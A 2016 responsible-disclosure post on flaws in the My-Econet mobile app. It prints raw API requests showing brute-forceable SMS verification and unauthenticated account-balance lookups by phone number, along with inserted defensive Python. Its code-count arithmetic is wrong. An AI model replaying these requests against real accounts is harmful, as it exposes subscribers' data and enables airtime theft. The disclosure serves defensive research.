[Responsible Disclosure] Multiple vulnerabilities in My-Econet app affecting millions of Econet-ZW subscribers.

Summary:

This post describes multiple vulnerabilities in the "My-Econet" app. Together they allow anyone to access another user's account information (account balance) and service status (call waiting, forwarding, roaming), and to remotely buy airtime for any Econet account; an experienced attacker can leverage this to remotely steal airtime from other Econet accounts. Several potential denial-of-service attacks also exist.
At the time of writing this article, I had just contacted the Econet app team with a detailed summary of the vulnerabilities and solutions.

Description:

Econet Wireless Zimbabwe's "My Econet" app is a self-care application for Econet's prepaid subscribers, available for Android and other smartphones, that allows you to securely manage your Econet account from your smart device. Using the app, Econet subscribers can get current balance information, purchase social media bundles, find out the latest promotions on offer, get directions to the nearest Econet Customer Services Centre, activate/deactivate value added services such as missed call alert, international roaming, call waiting, voicemail and ring back tone, and gain access to self-care facilities for airtime transfer and overscratched cards.

The app offers a range of features which many might find more appealing than typing out long USSD codes. However, almost all of the features have one or more vulnerabilities, ranging from the mild (improper authentication) to the severe (remote code execution, stealing airtime from other users' accounts). The app's security implementation is extremely lax, and an attacker of any skill level could take advantage of these vulnerabilities to cause real damage and/or access confidential information.
The list of vulnerabilities is quite long, so I will only go into detail on three of the most interesting ones and how they can be exploited. The video below shows how the vulnerabilities were discovered, and the Python code provided illustrates how they could have been actively exploited.

NB: I wrote this article before disclosing the vulnerability to the Econet team. However this article will only be published after the vulnerability has been disclosed in a proper manner. Please read the "Vulnerability Disclosure" page on this blog for the process and timeline.

Proof of concept video:

Proof of concept code:

Find on Github

Vulnerability #1 - App signup bruteforce

Opening the app for the first time, you gain access to the user interface but cannot access any services until a phone number is linked to your app. You provide your phone number and name and an SMS code is sent to your phone number. You can then enter the code to verify your phone number.

Two vulnerabilities exist in the signup stage which could be actively exploited by an attacker.

1. Register Account (Vulnerable Request)
GET /appsAPI/authentication/register/0783******/466ce041-1343-1fea-0309-ae4ff5c78200/9774d56d682e549c HTTP/1.1
User-Agent: curl/7.38.0
Host: applications.econet.co.zw:8080
Accept: */*

HTTP/1.1 200 OK
Connection: close
X-Powered-By: Undertow/1
Server: WildFly/8
Content-Type: application/json
Date: Tue, 22 Mar 2016 14:53:56 GMT

{"responseCode":"200","response":"Verification code sent to mobile via SMS","successStatus":true}


2. Verify Account (Vulnerable Request) SMS Code: 271825

GET /appsAPI/authentication/verify/0783******/77971074-c502-54a8-3787-ce7967e59924/19b02f77670437d2/271825 HTTP/1.1
Host: applications.econet.co.zw:8080
Accept: application/json, text/javascript, */*; q=0.01
User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Accept-Encoding: gzip,deflate
Accept-Language: en-GB, en-US
Accept-Charset: utf-8, iso-8859-1, utf-16, gb2312, gbk, *;q=0.7
Connection: close

HTTP/1.1 200 OK
Connection: close
X-Powered-By: Undertow/1
Server: WildFly/8
Content-Type: application/json
Date: Tue, 22 Mar 2016 15:24:42 GMT

{"responseCode":"200","response":"You have successfully verified access pin","successStatus":true}

Let's break down the API call.
GET /appsAPI/authentication/register/0783******/<APP_ID?>/<ANDROID_ID>

The <APP_ID> parameter seems to be generated within the app, and <ANDROID_ID> is the device's Android ID. You can obtain your device's Android ID by calling (see http://android-developers.blogspot.com/2011/03/identifying-app-installations.html):
Secure.getString(getContentResolver(), Secure.ANDROID_ID);

An attacker can spoof the <APP_ID> and <ANDROID_ID> and request an account on behalf of a user; an SMS code will be sent to the target, who will probably ignore the SMS. The verify account step, however, is open to brute force. The SMS code is a 6-digit code which means there are only 10,077,696 possible combinations, but the SMS code is always 6 characters, so the possible combinations are reduced to only 999999. An attacker could brute-force this value, verify the account, and use it as shown later. (Of course the attacker could also just read the verification code from the SMS sent to the victim.)
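As an added example (not code from this post or from Econet), here is what the verify step needs on the server side to stop the guessing the paragraph describes: each issued code allows a fixed number of attempts, expires, and is compared in constant time, so a 6-digit space cannot be walked online. The class name, the limits (5 guesses, 5 minutes) and the MSISDNs are assumptions.

```python
import hmac
import secrets
import time
from typing import Callable, Dict, Optional, Tuple

CODE_DIGITS = 6          # same length as the app's SMS code
MAX_ATTEMPTS = 5         # wrong guesses tolerated before the code is discarded (assumed limit)
CODE_TTL_SECONDS = 300   # a code is only good for five minutes (assumed limit)


class PendingCode:
    """One outstanding SMS code for a subscriber, with its guess counter."""

    def __init__(self, code: str, issued_at: float) -> None:
        self.code = code
        self.issued_at = issued_at
        self.attempts = 0


class VerificationService:
    """Server-side issue/verify of SMS codes with brute-force limits.

    The verify endpoint captured above accepts unlimited guesses. Here each
    issued code allows at most MAX_ATTEMPTS guesses and dies after
    CODE_TTL_SECONDS, so a guesser gets MAX_ATTEMPTS tries out of 10**6
    per SMS the victim receives, instead of the whole space.
    """

    def __init__(self, clock: Callable[[], float] = time.time) -> None:
        self._clock = clock                      # injectable for testing
        self._pending: Dict[str, PendingCode] = {}
        self._sessions: Dict[str, str] = {}      # bearer token -> verified MSISDN

    def register(self, msisdn: str) -> str:
        """Create a fresh code for msisdn; the return value goes to the SMS gateway only."""
        # CSPRNG-backed, zero-padded so every value in the space is equally likely.
        code = f"{secrets.randbelow(10 ** CODE_DIGITS):0{CODE_DIGITS}d}"
        self._pending[msisdn] = PendingCode(code, self._clock())
        return code

    def verify(self, msisdn: str, guess: str) -> Tuple[bool, str, Optional[str]]:
        """Return (ok, reason, session_token); the token is only set on success."""
        pending = self._pending.get(msisdn)
        if pending is None:
            return False, "no pending verification", None
        if self._clock() - pending.issued_at > CODE_TTL_SECONDS:
            del self._pending[msisdn]
            return False, "code expired", None
        if pending.attempts >= MAX_ATTEMPTS:
            # Lockout: discard the code so even the right value is now useless;
            # the subscriber must request a new SMS.
            del self._pending[msisdn]
            return False, "too many attempts", None
        pending.attempts += 1
        # Constant-time comparison so timing does not leak a matching prefix.
        if not hmac.compare_digest(pending.code.encode(), guess.encode()):
            return False, "wrong code", None
        del self._pending[msisdn]                # a code is usable exactly once
        token = secrets.token_urlsafe(32)
        self._sessions[token] = msisdn
        return True, "verified", token

    def msisdn_for_token(self, token: str) -> Optional[str]:
        """Look up which subscriber a session token was issued to."""
        return self._sessions.get(token)
```

Re-registering a number replaces the pending code, so the register endpoint itself still needs its own per-number rate limit to keep the guess budget honest.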

Vulnerability #2 - Improper authentication

This is the last thing you would expect to run into. This vulnerability affects all of Econet Wireless's prepaid subscribers...all 8-9 million of them. The vulnerability exists in the way the app requests information from the server. Information requested includes account information (current balance) and service status (call barring, roaming, forwarding, etc.).

Vulnerable request (Account Info):

GET /appsAPI/accountinfo/all/0783****** HTTP/1.1
Host: applications.econet.co.zw:8080
Accept: application/json, text/javascript, */*; q=0.01
User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Accept-Encoding: gzip,deflate
Accept-Language: en-GB, en-US
Accept-Charset: utf-8, iso-8859-1, utf-16, gb2312, gbk, *;q=0.7
Connection: close

HTTP/1.1 200 OK
Connection: close
X-Powered-By: Undertow/1
Server: WildFly/8
Content-Type: application/json
Date: Tue, 22 Mar 2016 15:25:33 GMT

{"responseCode":null,"response":"{\"responseCode\":\"0\",\"originTransactionID\":\"12\",\"serviceClassCurrent\":\"10\",\"currency1\":\"USD\",\"accountValue1\":\"-8250\",\"aggregatedBalance1\":null,\"currency2\":null,\"accountValue2\":null,\"aggregatedBalance2\":null,\"dedicatedAccountInfomationList\":[{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"1\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"2\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"3\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"4\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"20160704T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"5\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"6\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"7\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"8\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"9\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"10\",\"dedic
atedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"24\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"25\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"26\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"27\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"28\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"29\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"30\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"31\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"32\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"33\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"34\",\"dedicatedAccou
ntUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"35\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"36\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"37\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"38\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"20140605T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"40\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"42\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"43\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"50000\",\"expiryDate\":\"20160103T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"50\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"54\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"55\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"56\",\"dedicatedAccountUni
tType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"59\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"61\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"100000\",\"expiryDate\":\"20140610T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"62\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"73\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"80\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"89\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"90\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"92\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"20160220T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"93\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"20160220T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"94\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"20160220T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"95\",\"dedicatedAccountUnitTyp
e\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"20160220T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"96\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"20160220T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"97\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"20160220T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"104\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"105\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"108\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"110\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"20140610T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"111\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"115\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"119\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"120\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"122\",\"dedicatedAccountUnitTyp
e\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"123\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"145\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"146\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"147\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"148\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"149\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"150\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"155\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"156\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"157\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"176\",\"dedicatedAccountUnitT
ype\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"177\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"185\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"195\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"203\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"204\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"205\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"206\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"207\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"208\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"209\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"}],\"supervisionExpiryDate\":\"20160727T12:00:00+0200\",\"serviceFeeExpiryDate\":\"20171025T12
:00:00+0200\",\"creditClearanceDate\":\"20190422T12:00:00+0200\",\"serviceRemovalDate\":\"20200720T12:00:00+0200\",\"languageIDCurrent\":\"1\",\"temporaryBlockedFlag\":null,\"chargingResultInformationList\":null,\"offerInformationList\":[{\"expiryDateTime\":\"20160408T19:10:46+0200\",\"offerID\":\"330\",\"offerState\":\"0\",\"offerType\":\"2\",\"productID\":\"11\",\"startDateTime\":\"20160309T18:40:28+0200\",\"packagename\":null}],\"accountFlagAfter\":{\"statebefore\":false,\"activationStatusFlag\":\"1\",\"negativeBarringStatusFlag\":\"0\",\"serviceFeePeriodExpiryFlag\":\"0\",\"serviceFeePeriodWarningActiveFlag\":\"0\",\"supervisionPeriodExpiryFlag\":\"0\",\"supervisionPeriodWarningActiveFlag\":\"0\",\"stateafter\":true},\"accountFlageBefore\":{\"statebefore\":true,\"activationStatusFlag\":\"1\",\"negativeBarringStatusFlag\":\"0\",\"serviceFeePeriodExpiryFlag\":\"0\",\"serviceFeePeriodWarningActiveFlag\":\"0\",\"supervisionPeriodExpiryFlag\":\"0\",\"supervisionPeriodWarningActiveFlag\":\"0\",\"stateafter\":false}}","successStatus":true}

Vulnerable Request (Services Status)

GET /appsAPI/buddieservices/263783****** HTTP/1.1
Host: applications.econet.co.zw:8080
Accept: application/json, text/javascript, */*; q=0.01
User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Accept-Encoding: gzip,deflate
Accept-Language: en-GB, en-US
Accept-Charset: utf-8, iso-8859-1, utf-16, gb2312, gbk, *;q=0.7
Connection: close

HTTP/1.1 200 OK
Connection: close
X-Powered-By: Undertow/1
Server: WildFly/8
Content-Type: application/json
Date: Tue, 22 Mar 2016 15:27:18 GMT

{"response":"\r\nEnter command: RESP:1001;","roaming":false,"voicemail":false,"missedcallalert":false,"callWaiting":null,"prbt":null,"successStatus":false,"callForwarding":0}

From the requests it's clear that no authentication token or HTTP header is sent along with them. This simply means that this information was intended to be publicly accessible by anyone.
An attacker can just change the phone number in the HTTP request to get potentially sensitive information about another user. Freaky!!!
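An added example (not Econet's code and not from the original post) of the check the account-info endpoint is missing: a bearer token issued at SMS verification is bound to one MSISDN, and a request for /appsAPI/accountinfo/all/<msisdn> is answered only when the number in the path belongs to that session, with the unauthenticated handler beside it mirroring what the captured request shows. Handler names, balances and MSISDNs are constructed, and normalising the 0783... and 263783... forms seen in the two URLs above assumes Zimbabwe's 263 country code.

```python
import secrets
from typing import Dict, List, Optional, Tuple

# Constructed sample data: balances keyed by MSISDN in international form.
BALANCES: Dict[str, int] = {"263783000001": 1250, "263783000002": -8250}
SESSIONS: Dict[str, str] = {}   # bearer token -> MSISDN proven by SMS verification
AUDIT: List[str] = []           # denied cross-account reads, for detection/alerting

Response = Tuple[int, dict]


def canonical_msisdn(number: str) -> Optional[str]:
    """Normalise the two spellings the app uses (0783... and 263783...) to one
    international form, so an ownership check cannot be sidestepped by writing
    the same number differently. Assumes Zimbabwe's 263 country code."""
    digits = "".join(ch for ch in number if ch.isdigit())
    if digits.startswith("0") and len(digits) == 10:
        digits = "263" + digits[1:]
    if digits.startswith("263") and len(digits) == 12:
        return digits
    return None


def issue_session(msisdn: str) -> str:
    """Called once SMS verification succeeds: bind a random token to that number."""
    token = secrets.token_urlsafe(32)
    SESSIONS[token] = canonical_msisdn(msisdn)
    return token


def account_info_vulnerable(path_msisdn: str, headers: Dict[str, str]) -> Response:
    # Mirrors the behaviour captured above: the number in the URL alone decides
    # whose balance comes back, so any caller can read any subscriber.
    number = canonical_msisdn(path_msisdn)
    return 200, {"msisdn": number, "accountValue1": BALANCES.get(number)}


def account_info_hardened(path_msisdn: str, headers: Dict[str, str]) -> Response:
    auth = headers.get("Authorization", "")
    if not auth.startswith("Bearer "):
        return 401, {"error": "authentication required"}
    owner = SESSIONS.get(auth[len("Bearer "):])
    if owner is None:
        return 401, {"error": "unknown or expired session"}
    requested = canonical_msisdn(path_msisdn)
    if requested is None:
        return 400, {"error": "malformed msisdn"}
    if requested != owner:
        # Object-level authorisation failure: record it and deny, without
        # revealing whether the other number exists.
        AUDIT.append(f"{owner} attempted to read {requested}")
        return 403, {"error": "forbidden"}
    return 200, {"msisdn": owner, "accountValue1": BALANCES.get(owner)}
```

A burst of AUDIT entries from one session, or many distinct MSISDNs requested from one client address, is the enumeration signature to alert on.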

Remote Code Execution

Looking at the "My-Econet" app Google Play page shows the app has 10,000 - 50,000 installs. This vulnerability affects all 10-50,000 app users and would require a moderately experienced attacker to exploit. The vulnerability exists in the way messages from the server are displayed within the app. The PoC video below illustrates two methods by which an attacker could remotely execute code in the context of the My-Econet app.

Video POC:

Resolution:

The vulnerabilities in the My-Econet app are extremely concerning in that they are not only implementation flaws in how the client app processes data but also severely lax authentication and poor security implementation on the server. Together they expose all EconetZW subscribers to at least one form of attack. Ordinary subscribers have sensitive information about their accounts exposed to the public, and experienced attackers can leverage the "Transfer Airtime" feature and the verification code brute-force vulnerability to steal airtime from users or remotely divert calls. For the 10-50,000 users of the My-Econet app, an experienced attacker on the same network as the victim can easily intercept traffic, reducing the effort needed to steal airtime or remotely divert calls. Even more concerning, an attacker can remotely execute code in the context of the app and use it to run exploits to gain control of the device. The same remote execution vulnerability can be used to steal the My-Econet app source code, which runs inside an Android WebView.
An immediate fix would be to take the server offline, effectively killing support for the current version of the app, then improve server-side authentication and use only HTTPS.

Disclosure Timeline:

March 28th, 2016: Report sent to My-Econet App Developers.
March 29th, 2016: Contact from EconetZW acknowledging receipt of the report and forwarding it to the responsible department.
April 5th, 2016: Publicly disclosed vulnerability.
